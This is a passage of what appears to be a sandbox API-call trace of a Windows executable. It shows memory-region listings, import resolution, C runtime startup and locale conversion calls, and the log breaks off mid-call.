"\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 6309 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 6310 start_va = 0x710000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 6349 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 6350 start_va = 0x610000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6351 start_va = 0x710000 end_va = 0x739fff entry_point = 0x710000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6352 start_va = 0x8d0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 6353 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6354 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 6355 start_va = 0x710000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 6356 start_va = 0x8e0000 end_va = 0x1cdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 6357 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6358 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6359 start_va = 0x1ce0000 end_va = 0x1e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Thread: id = 786 os_tid = 0xec8 [0259.932] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0259.933] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0259.933] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0259.933] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0259.933] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0259.933] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0259.933] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0259.933] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0259.933] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0259.933] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0259.934] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0259.935] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0259.936] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0259.937] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0259.938] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0259.939] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0259.939] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0259.939] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0259.939] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0259.939] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0259.939] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0259.939] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0259.939] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0259.939] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0259.939] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0259.939] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0259.939] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0259.939] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0259.939] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0259.939] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0259.940] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0259.940] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0259.940] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0259.940] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0259.940] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0259.940] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0259.940] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0259.940] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0259.940] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0259.940] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0259.940] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0259.940] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0259.940] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0259.940] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0259.940] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0259.941] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0259.941] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0259.941] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0259.941] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0259.941] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0259.941] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0259.941] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0259.941] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0259.941] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0259.941] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0259.941] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0259.941] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0259.941] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0259.941] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0259.942] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x486c81c8, dwHighDateTime=0x1d45ac6)) [0259.942] GetCurrentThreadId () returned 0xec8 [0259.942] GetCurrentProcessId () returned 0xed4 [0259.942] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=30740420541) returned 1 [0259.942] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0259.942] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0259.942] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0259.942] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0259.942] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0259.942] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0259.942] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0259.942] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0259.943] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0259.944] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0259.944] GetCurrentThreadId () returned 0xec8 [0259.945] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x61fd4ce4, hStdError=0x475810)) [0259.945] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0259.945] GetFileType (hFile=0x38) returned 0x2 [0259.945] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc0 [0259.945] GetFileType (hFile=0xc0) returned 0x3 [0259.945] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0259.945] GetFileType (hFile=0x40) returned 0x2 [0259.945] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner" [0259.945] GetEnvironmentStringsW () returned 0x621e68* [0259.945] FreeEnvironmentStringsW (penv=0x621e68) returned 1 [0259.945] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0259.946] GetLastError () returned 0x0 [0259.946] SetLastError (dwErrCode=0x0) [0259.946] GetLastError () returned 0x0 [0259.946] SetLastError (dwErrCode=0x0) [0259.946] GetLastError () returned 0x0 [0259.946] SetLastError (dwErrCode=0x0) [0259.946] GetACP () returned 0x4e4 [0259.946] GetLastError () returned 0x0 [0259.946] SetLastError (dwErrCode=0x0) [0259.946] IsValidCodePage (CodePage=0x4e4) returned 1 [0259.946] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0259.946] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0259.946] GetLastError () returned 0x0 [0259.946] SetLastError (dwErrCode=0x0) [0259.946] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0259.946] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0259.946] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0259.946] GetLastError () returned 0x0 [0259.946] SetLastError (dwErrCode=0x0) [0259.946] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0259.947] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0259.947] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0259.947] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0259.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 